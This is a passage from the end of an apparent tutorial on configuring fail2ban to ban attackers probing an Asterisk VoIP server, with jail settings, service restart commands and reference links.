sendmail-whois[name=ASTERISK, dest=root, sender=fail2ban@example.org]
logpath = /var/log/asterisk/messages
maxretry = 5
bantime = 259200

Note 0: check that asterisk really are saving the logs in /var/log/asterisk/messages

Restart services:

root@sipbox#/etc/init.d/asterisk restart
root@sipbox#/etc/init.d/fail2ban restart

Note 1: Fail2Ban send information about the attackers, such as IP, IP Country, Name of buyer, Company ISP, contact email .... ... .. . and more.

Thanks for your attention !!
Regards.

Bibliography:

http://code.google.com/p/sipvicious/
http://www.voip-info.org/